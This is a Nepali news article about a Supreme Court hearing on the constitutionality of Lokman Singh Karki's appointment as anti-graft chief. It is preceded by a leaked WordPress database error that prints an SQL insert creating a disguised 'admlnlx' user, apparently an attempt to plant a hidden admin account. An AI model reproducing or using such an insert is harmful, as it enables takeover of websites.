WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJ3H9ri9wSnpDIXUVST/2ZRc/6IsHe.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 14:49:13', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस ७ –
अख्तियारका निलम्बित प्रमुख आयुक्त लोकमानसिंह कार्की विरूद्धको मुद्दामा सर्वोच्च अदालतमा केहीबेर अघि सुनुवाई सुरू भएको छ। न्यायाधीश आनन्दमोहन भट्टराई, ईश्वर प्रसाद खतिवडा, अनिलकुमार सिन्हाको पूर्ण इजलासले सुनुवाई सुरू गरेको हो।
यसअघि मंसिर १६ गते न्यायाधीशहरु जगदीश शर्मा पौडेल, ईश्वर प्रसाद खतिवडा र आन्दन्दमोहन भट्टराईको पूर्ण इजलासमा परेको थियो । यसपालीको इजलासमा पौडेलको ठाउँमा न्यायाधीश सिंन्हा परेका छन्।
अधिवक्ता ओमप्रकाश अर्यालले कार्कीको नियुक्ती संविधान विपरित भएको भन्दै सर्वोच्च अदालतमा रीट निवेदन दायर गरेका थिए। सर्वोच्च अदालतले सुरूमा अर्यालको रीट खारेज गरेको थियो। पछि प्रधानन्यायाधीश सुशीला कार्कीलगायतको बेन्चले सो मुद्दा पुनः ब्युताएर सुनुवाई हुने निर्णय दिएको थियो।
पछिल्लो पटक मंसिर १६ को सुनुवाई कार्की पक्षका वकिल बालकृष्ण न्यौपाने उपस्थित हुन नसकेको भन्दै स्थगितका लागि निवेदन दिएका थिए। न्यायाधीशहरूले फेरि यो मुद्दामा सुनुवाई स्थगित हुन नसक्ने भन्दै एक पटकलाई कार्की पक्षको निवेदन स्वीकार गरेको थियो।
न्यायाधीशहरूले दुबै पक्षबाट बहसका लागि धेरै वकिलहरूले नाम लेखाएकाले समय व्यवस्थापन गर्न पनि दुबै पक्षलाई भनेका थिए। आज सुरू भएको सुनुवाई केही दिनमै सकिने अनुमान गरिएको छ।
कार्कीको नियुक्ति संवैधानिक थियो वा थिएन भन्ने निर्णय सर्वोच्चले एक साताभित्रै सुनाउने सम्भावना छ।
लोकमानविरूद्ध संसदमा एक चौथाइभन्दा बढी सांसदहरूले महाभियोगको प्रस्ताव दर्ता गरिसकेका छन्। प्रस्ताव दर्ता लगत्तै संवैधानिक प्रावधानअनुसार कार्की अहिले निलम्बित अवस्थामा छन्।